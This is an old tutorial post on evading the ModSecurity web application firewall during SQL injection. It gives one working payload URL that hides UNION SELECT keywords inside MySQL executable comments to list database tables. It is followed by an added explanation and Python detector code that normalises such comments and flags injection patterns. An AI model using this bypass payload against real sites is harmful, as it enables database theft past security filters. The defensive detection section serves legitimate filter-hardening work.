[TUTORIAL] Mod_Security bypass (SQLi)
Wednesday, February 26, 2014
Today I will show you how to bypass the Mod_Security WAF for an SQLi attack.
Most of you have probably run a query such as UNION SELECT 1,2,3,4... and seen a message like "Not Acceptable!"
Take a look at the following picture:
This message is generated by a WAF called Mod_Security, and here is how you can bypass it:
Code:
http://www.vulnsite.com/index.php?id=-13+/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
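Why this request passes a keyword filter, and how a filter can still catch it, as an added example that is not part of the original post: MySQL executes the body of `/*!50000 ... */` comments, so a rule looking for UNION SELECT in the raw parameter never sees the two keywords next to each other. The sketch below unwraps such comments before matching; the function names are hypothetical and the sample input is the `id` value from the URL above.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*! ... */ (optionally prefixed by a 5-digit minimum
# version, as in the page's /*!50000 ... */); a naive filter sees a comment.
EXEC_COMMENT = re.compile(r"/\*!(?:\d{5})?(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+|distinct\s+)?\bselect\b", re.I)
SCHEMA_REF = re.compile(r"\binformation_schema\b", re.I)

# The id parameter exactly as it appears in the URL on this page.
SAMPLE_ID = ("-13+/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,"
             "table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables"
             "+where+/*!table_schema*/=database()--+")


def naive_match(value: str) -> bool:
    """Keyword check on the URL-decoded value only: what the bypass defeats."""
    return bool(UNION_SELECT.search(unquote_plus(value)))


def normalize(value: str) -> str:
    """Return the parameter roughly as MySQL would tokenize it."""
    text = unquote_plus(value)
    prev = None
    while prev != text:  # unwrap executable comments, keeping their body
        prev = text
        text = EXEC_COMMENT.sub(r" \1 ", text)
    text = PLAIN_COMMENT.sub(" ", text)  # ordinary comments act as whitespace
    return re.sub(r"\s+", " ", text).strip()


def inspect(value: str) -> list:
    """Return the list of findings for one request parameter."""
    findings = []
    if EXEC_COMMENT.search(unquote_plus(value)):
        findings.append("mysql-executable-comment")
    norm = normalize(value)
    if UNION_SELECT.search(norm):
        findings.append("union-select")
    if SCHEMA_REF.search(norm):
        findings.append("information-schema")
    return findings


if __name__ == "__main__":
    print("naive filter matches:", naive_match(SAMPLE_ID))
    print("normalized:", normalize(SAMPLE_ID))
    print("findings:", inspect(SAMPLE_ID))
```

An executable comment in a numeric `id` parameter is itself a strong signal, so the first finding alone is worth alerting on. Input filtering remains a second layer; binding `id` as a query parameter removes the injection point.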